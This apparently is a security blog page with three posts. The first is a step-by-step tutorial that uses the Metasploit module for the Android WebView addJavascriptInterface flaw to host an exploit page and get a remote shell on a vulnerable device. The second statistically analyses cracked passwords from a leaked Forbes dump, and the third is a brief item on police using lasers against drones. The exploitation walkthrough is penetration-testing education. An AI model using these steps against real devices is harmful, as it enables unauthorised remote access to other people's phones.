Android Webview Exploit Tutorial (70% of Devices Vulnerable!)

Around 70% of all Android devices in the field are subject to a Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code.

Called the “Android WebView addJavascriptInterface Vulnerability”, it works when untrusted Javascript code is executed by a WebView on Android devices.

And here is the kicker, about 70% of Android devices (phones and tablets) are vulnerable to it!

This month Rapid7 added the exploit as a Metasploit Module, so let’s take a look at it using Kali Linux and Metasploit:

1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.

2. Type, “use exploit /android/browser/webview_addjavascriptinterface”.

3. Then type, “show options” to see what needs to be set:

Use Exploit

For the most part, you are good to go. You can turn on SSL if you want, change the port or host address if you want. But one variable I did change was URIPATH. By default it is random, so I changed it to something easier to type in.

“Security” sounded reassuring.

4. Enter, “set URIPATH Security”:

Set UriPath Exploit

5. Finally, type “exploit”:

Exploit

A server is started on the Kali system that hosts a webpage containing the exploit. A URL is provided including the URI path.

Now if a vulnerable Android device surfs to our Metasploit module, sitting at 192.168.1.16:8080/Security in this demo, you get a remote session:

Session created

Now just connect to the session using “sessions -i 1”:

Interacting with session

And that is it! You are connected to the Android device.

But on one Android Tablet that I tested, something didn’t seem right. It allowed me to run some Linux commands but not others. I could use “pwd” to see the current directory that I was in, and I could surf to other directories with “cd”, but the “ls” and other commands would not work:

LS not found

Whenever I ran “ls”, to view the files in the directory, I would get a “<stdin>[2]: ls: not found” error.

A quick check of the path with “echo path” revealed that no path was set:

Echo Path

So I set it by typing, “export PATH=/system/bin:$PATH”:

Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:

export path

As you can see, I had a complete remote shell to the Android device.

All I had to do was visit a malicious page using the built in Browser and the exploit ran with no further warning or input from the Android device. To make matters worse, the URL could be printed as a QR Code so that once it is scanned, it automatically goes to the malicious page for true “click and pwn”.

So what can you do to protect yourself against this type of attack?

The exploit only works on versions of Android < 4.2. Which apparently is 70% of current devices…

Update your device to the latest version of Android (if it will update), check with your manufacturer for instructions.

Also, never scan in QR Codes from unknown sources.

But I did notice that one device I tested wasn’t 4.2, it was a 4.0 version – and it was not vulnerable. But I remembered that the Android Browser did have an update that I downloaded before testing.

Not sure if this will be true for all devices, again the best course of action would be to update to the latest OS version.

Want to learn a lot more about Kali Linux and Metasploit? Check out my new book, “Basic Security Testing with Kali Linux“.

Advertisements

Analysis of Forbes Passwords Dumped by the SEA

SEA Forbes

Recently the Syrian Electronic Army (SEA) hacked the news site Forbes and publicly dumped more than a million records from their WordPress site. As usual we will take a look at this dump with the analysis program “Pipal”.

This password dump was a little different than the ones that we have seen in the past. As explained on Sophos’ Naked Security site, the passwords were stored encrypted in the PHPass Portable format as seen below:

You can see from this example picture from Sophos that the passwords are stored in an encrypted hash, and that each account also includes what is called a “salt”.

The hashes that we have looked at in the pass didn’t have a salt – Basically a random number used when creating the hash to make sure each hash is unique.

This makes decrypting the passwords a lot more time consuming, as before all we needed to do was crack the hash and we would be able to crack other hashes that used the same password very quickly.

Not so with a salted password, each password will be unique, so we have to crack each and everyone individually.

So, to attempt to crack the entire million plus password hashes would have taken something like 10 years. So, for time, and sanity sake, I pulled about 20,000 hashes randomly from throughout the dump.

It still took several hours to work through this list.

As I have seen cracking speeds in the thousands per minute when cracking non-salted hashes, this time it averaged about 15 per minute!

So, without further ado, here are some of the results:

Top 25 passwords

millenium = 761 (4.32%)
123456 = 597 (3.39%)
password = 351 (1.99%)
q1w2e3r4 = 266 (1.51%)
123456789 = 142 (0.81%)
abc123 = 97 (0.55%)
12345678 = 92 (0.52%)
qwerty = 91 (0.52%)
987654321 = 76 (0.43%)
111111 = 68 (0.39%)
0 = 59 (0.33%)
sunshine = 56 (0.32%)
letmein = 51 (0.29%)
password1 = 48 (0.27%)
passw0rd = 44 (0.25%)
baseball = 43 (0.24%)
monkey = 42 (0.24%)
1qaz2wsx = 41 (0.23%)
abcd1234 = 41 (0.23%)
123123 = 40 (0.23%)
success = 38 (0.22%)
Password1 = 35 (0.2%)
welcome = 34 (0.19%)
1234567 = 34 (0.19%)
maggie = 33 (0.19%)

Password length (length ordered)

1 = 61 (0.35%)
2 = 2 (0.01%)
3 = 5 (0.03%)
4 = 125 (0.71%)
5 = 246 (1.4%)
6 = 7075 (40.13%)
7 = 3421 (19.41%)
8 = 4283 (24.3%)
9 = 1913 (10.85%)
10 = 390 (2.21%)
11 = 99 (0.56%)
12 = 9 (0.05%)

Length and Complexity

One to six characters = 7514 (42.62%)
One to eight characters = 15218 (86.32%)
More than eight characters = 2411 (13.68%)

Only lowercase alpha = 13198 (74.87%)
Only uppercase alpha = 7 (0.04%)
Only alpha = 13205 (74.9%)
Only numeric = 1862 (10.56%)

Conclusion

Granted we only cracked a small portion of the list due to time restraints (because they were salted), but the results look very similar to what we have seen in the past.

The top 25 passwords used, length and complexity still seem very consistent with other password dumps that we have analyzed.

The majority of passwords used were 6 to 9 characters in length and used only lower case letters.

For better security, use long complex passwords incorporating random Upper and Lowercase letters, numbers and symbols. Also, use a different complex password for every server or website that you use, in case passwords are compromised as in this case.

Ukraine Police try to Blind Drone with Laser

Ukraine police try to blind drone cameras during violent struggle in Maidan Square.

I don’t mean to belittle what is going on in Ukraine in any way, but this video caught my attention from a technical standpoint.

First of all, remote drones are being used to capture images that show proof of what is happening in that country. And secondly, the police force purposefully tried to blind the drone camera by shinning a laser at it.

We will see drones used a lot more in the future to capture events like this, and I am sure opposition forces will increase tactics to either disable or destroy them.